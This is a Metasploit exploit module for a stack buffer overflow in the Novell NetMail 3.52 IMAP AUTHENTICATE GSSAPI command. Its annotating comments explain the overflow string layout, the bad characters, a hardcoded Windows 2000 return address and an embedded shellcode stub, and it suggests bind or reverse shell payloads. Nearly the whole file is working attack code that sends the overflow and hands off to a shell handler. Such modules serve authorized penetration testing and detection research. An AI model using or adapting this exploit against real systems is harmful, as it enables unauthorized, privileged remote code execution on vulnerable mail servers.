##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Stack buffer overflow in the IMAP AUTHENTICATE GSSAPI handler of Novell
  # NetMail 3.52 (see 'Description' below). A single target is defined
  # (Windows 2000 SP0-SP4 English) with one fixed return address, which is
  # why the module is ranked Average rather than higher.
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata and its single option, RPORT (default 143,
  # the standard IMAP port).
  #
  # @param info [Hash] metadata merged into the module by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Novell NetMail IMAP AUTHENTICATE Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE
          GSSAPI command. By sending an overly long string, an attacker can overwrite the
          buffer and control program execution. Using the PAYLOAD of windows/shell_bind_tcp
          or windows/shell_reverse_tcp allows for the most reliable results.
        },
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'OSVDB', '55175' ]
        ],
        # The overflowed service runs with elevated rights, so a successful
        # session is privileged.
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
          'AllowWin32SEH' => true
        },
        # Payload constraints: 850 bytes of room, and the bytes that would
        # terminate or split an IMAP command line are excluded
        # (\x00 NUL, \x20 space, \x2c comma, \x3a colon, \x40 '@'); the
        # encoder is restricted to uppercase alphanumerics to stay inside
        # that character set. The prepended bytes run before the encoded
        # payload and look like an `add esp, imm32` stack-pointer adjustment
        # (81 c4 + little-endian 0xfffff254) — presumably to move the stack
        # away from the payload; confirm with a disassembler.
        'Payload' => {
          'Space' => 850,
          'BadChars' => "\x00\x20\x2c\x3a\x40",
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
        },
        'Platform' => 'win',
        # 'Ret' is written into the overflow string as a 32-bit little-endian
        # value (see the pack('V') call in #exploit).
        'Targets' => [
          [ 'Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 } ],
        ],
        'DisclosureDate' => '2007-01-07',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([ Opt::RPORT(143) ])
  end

  # Builds the overflow string and sends it in a single IMAP session.
  #
  # Layout of `sploit`, in send order (sizes as written in the code):
  #   "A001 AUTHENTICATE GSSAPI\r\n"  - the command that reaches the vulnerable path
  #   1258 bytes of upper-alpha filler
  #   payload.encoded                  - at most 850 bytes, upper-alphanumeric
  #   "\xeb\x06"                       - presumably an x86 `jmp short` over the
  #                                      next six bytes (2 filler + 4 ret)
  #   2 bytes of filler + target.ret   - return address, little-endian
  #   8 NOPs + `jmp` stub + 700 bytes of upper-alpha filler
  # An "A002 LOGOUT" command is appended and everything goes out in one put.
  #
  # Detection note: the trigger is an AUTHENTICATE GSSAPI line of several
  # kilobytes, mostly uppercase filler, followed immediately by LOGOUT; an
  # IMAP command line of that length is far outside normal client behaviour.
  #
  # `<<` mutates the string literals in place, so this file cannot adopt
  # `# frozen_string_literal: true` without changing these to `+=` or `dup`.
  def exploit
    connect
    # Consume whatever the server sends first (presumably the IMAP greeting).
    sock.get_once

    # Small machine-code stub placed after the NOP sled. Its bytes are not
    # documented on this page; the d9 ee / d9 74 24 f4 sequence looks like the
    # well-known fnstenv-based GetPC prologue of an XOR decoder loop — a
    # pattern many IDS signatures match on. Confirm by disassembling.
    jmp = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2f\x77\x28"
    jmp << "\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d"
    jmp << "\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b"

    sploit = "A001 AUTHENTICATE GSSAPI\r\n"
    sploit << rand_text_alpha_upper(1258) + payload.encoded + "\xeb\x06"
    # 'V' packs target.ret as an unsigned 32-bit little-endian integer.
    sploit << rand_text_alpha_upper(2) + [target.ret].pack('V')
    sploit << make_nops(8) + jmp + rand_text_alpha_upper(700)

    print_status("Trying target #{target.name}...")
    sock.put(sploit + "\r\n" + "A002 LOGOUT\r\n")

    # Hand off to the payload handler, then close the IMAP socket.
    handler
    disconnect
  end
end